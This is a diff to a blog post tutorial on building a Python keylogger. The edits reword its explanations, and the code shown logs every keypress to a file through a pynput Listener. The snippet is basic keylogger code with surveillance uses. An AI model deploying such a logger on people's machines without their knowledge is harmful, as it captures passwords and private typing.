brentvollebregt/nitratine.net/posts/python-keylogger/post.md

 logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
 ```

 Then create a definition for keypresses called on_press which takes key as a parameter.
-In this definition we want to log using the info method the key type casted to a string.
+In this definition, we want to log the key using the logging info method.
+The key will need to be casted to a string before logging it.

 ```python
 def on_press(key):
     logging.info(str(key))
 ```

-Next setup an instance of Listener and define the on_press method in a with statement and then join the instance to the main thread.
+Next setup an instance of Listener and define the on_press method in a `with` statement and then `.join()` the thread to the main thread.

 ```python
 with Listener(on_press=on_press) as listener: